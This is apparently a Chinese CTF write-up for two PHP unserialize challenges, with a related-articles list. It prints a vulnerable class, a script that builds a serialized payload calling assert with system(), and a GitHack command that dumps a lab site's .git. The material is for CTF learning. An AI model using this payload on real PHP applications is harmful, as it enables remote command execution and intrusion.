2. 程式人生 > 其它 >unserialize反序列化 安鸞 Writeup

unserialize反序列化 安鸞 Writeup

阿新 發佈:2021-08-13

關於php反序列化漏洞原理什麼,可以看看前輩的文章:
https://xz.aliyun.com/t/3674
https://chybeta.github.io/2017/06/17/淺談php反序列化漏洞/
B站也有相關學習視訊
https://search.bilibili.com/all?keyword=php反序列化

安鸞平臺有兩題unserialize反序列化題目:

index.php

<?php

class site{
    public $url = 'www.whalwl.com';
    public $name;
    public $title;

    function __destruct(){
       $a = $this->name;
       $a($this->title);
    }
}
unserialize($_POST['dage']);

highlight_file("index.php");
?>

PHP序列化

<?php
class site{
    public $url = 'www.whalwl.com';
    public $name = 'assert';
    public $title = "system('ls');";
	#public $title = "system('cat flag_aeb45a3fb5a3d769.txt');";
}
$jzking121 = new site();
$object = serialize($jzking121);
print_r($object);
?>

O:4:"site":3:{s:3:"url";s:14:"www.whalwl.com";s:4:"name";s:6:"assert";s:5:"title";s:13:"system('ls');";}

記得POST提交:

第二題 code

使用GitHack提取網站的git資訊

python GitHack.py http://whalwl.xyz:8026/.git/
其中webshell_d5f6d142a4383e40.php

<?php
class site{
	public $domain = 'www.brskills.com';
    public $name;
    public $title;

    function __destruct(){
       $a = $this->name;
       $a($this->title);
    }
}
unserialize($_POST['dage']);
?>

修改一下變數名和值,就可以獲取flag。

本文來自部落格園,作者:jzking121,轉載請註明原文連結:https://www.cnblogs.com/jzking121/p/15138524.html

相關推薦

unserialize序列 Writeup

關於php序列漏洞原理什麼,可以看看前輩的文章: https://xz.aliyun.com/t/3674 https://chybeta.github.io/2017/06/17/淺談php序列漏洞/

序列中的物件逃逸——洵杯2019 easy_serialize_php

一週沒寫部落格了,這裡簡單梳理一下序列的普遍知識點 序列的物件逃逸問題一般分為兩種~~,我先談一下自己的理解,首先是過濾函式分為兩種情況

成理信協會題目序列02

明面上看著不可能的題一般就預示著有空子可鑽。 直接上原始碼### <?php show_source(__FILE__);

成理信協會序列01-利用fastcoll實現md5碰撞

雖然是序列的題目,但主要考點在利用fastcoll實現md5碰撞。 直接上原始碼

[CTF]php序列(unserialize)利用

技術標籤:WEB安全phpweb滲透測試unctf [CTF]php序列(unserialize)利用 PHP序列序列介紹

php安全攻防世界unserialize函式序列示例詳解

步驟 首先開啟題目,發現給了一段原始碼: 分析原始碼,發現類裡面有三個魔術方法:

淺談Phar序列漏洞利用:N1CTF 2021 easyphp & 洵杯2021 EZ_TP

Phar 什麼是Phar PHp ARchive, like a Java JAR, but for PHP. phar(PHp ARchive)是類似於JAR的一種打包檔案。PHP ≥5.3對Phar字尾檔案是預設開啟支援的,不需要任何其他的安裝就可以使用它。

fastJson序列處理泛型 我能從中學到什麼

都會的json解析 在我們日常的編碼工作中,常常會制定或者遇到這樣的json結構

ProtoStuff無法序列Deprecated註解成員問題記錄

在開發過程中,遇到一個鬼畜的問題,在DO的某個成員上新增@Deprecated註解之後,通過ProtoStuff序列得到的DO中,這個成員一直為null;花了不少時間才定位這個問題,特此記錄一下

Java JDBC導致的序列攻擊原理解析

這篇文章主要介紹了Java JDBC導致的序列攻擊原理解析,文中通過示例程式碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友可以參考下

JAVA序列序列的底層實現原理解析

一、基本概念 1、什麼是序列序列  (1)Java序列是指把Java物件轉換為位元組序列的過程,而Java序列是指把位元組序列恢復為Java物件的過程;

Python序列序列pickle用法例項

這篇文章主要介紹了Python序列序列pickle用法例項,文中通過示例程式碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友可以參考下

Django框架序列序列操作詳解

本文例項講述了Django框架序列序列操作。分享給大家供大家參考,具體如下:

java物件序列序列原理解析

這篇文章主要介紹了java物件序列序列原理解析,文中通過示例程式碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友可以參考下

Java原生序列序列程式碼例項

這篇文章主要介紹了Java原生序列序列程式碼例項,文中通過示例程式碼介紹的非常詳細,對大家的學習或者工作具有一定的參考學習價值,需要的朋友可以參考下

淺析PHP序列中過濾函式使用不當導致的物件注入問題

1.漏洞產生的原因 #### 正常的序列語句是這樣的 $a=\'a:2:{s:8:\"username\";s:7:\"dimpl3s\";s:8:\"password\";s:6:\"abcdef\";}\';

php序列長度變化尾部字串逃逸(0CTF-2016-piapiapia)

一個很可愛的登入介面: 進行一下目錄掃描,發現原始碼洩露www.zip,把原始碼給出:

Python 序列序列庫 MarshMallow 的用法例項程式碼

序列(Serialization)與序列(Deserialization)是RESTful API 開發中繞不開的一環,開發時,序列序列的功能實現中通常也會包含資料校驗(Validation)相關的業務邏輯。

詳解php序列

1 前言 最近也是在複習之前學過的內容,感覺對PHP序列的理解更加深了,所以在此總結一下

Apache Commons Collections序列研究

目錄一、影響版本二、原理分析幾個提示點1.利用InvokerTransformer執行系統命令2.利用ChainedTransformer類實現鏈式呼叫3.TransformedMap類觸發呼叫鏈4.AnnotationInvocationHandler序列觸發TransformedMap類呼叫